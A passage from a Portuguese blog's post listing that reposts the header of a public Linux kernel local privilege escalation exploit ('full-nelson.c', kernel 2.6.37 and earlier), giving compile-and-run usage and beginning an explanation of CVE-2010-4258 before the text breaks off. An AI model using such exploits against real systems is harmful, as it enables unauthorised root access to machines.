Pular para o conteúdo principal

Postagens

Mostrando postagens de novembro, 2013

Wall-E feito com Arduino

Escalando Privilegio kernel 2.6.32-21

Exploit usado para tal (2.6.37 Local Privilegio Escalation) exploit    code to exploit /* Hi all, I've included here a proof-of-concept local privilege escalation exploit for Linux.  Please read the header for an explanation of what's going on.  Without further ado, I present full-nelson.c: Happy hacking, Dan --snip-- */ /*   * Linux Kernel <= 2.6.37 local privilege escalation   * by Dan Rosenberg   * @djrbliss on twitter   *   * Usage:   * gcc full-nelson.c -o full-nelson   * ./full-nelson   *   * This exploit leverages three vulnerabilities to get root, all of which were   * discovered by Nelson Elhage:   *   * CVE-2010-4258   * -------------   * This is the interesting one, and the reason I wrote this exploit.  If a   * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL   * word will be written to a user-specified pointer when that thread exits.   * This write is done using pu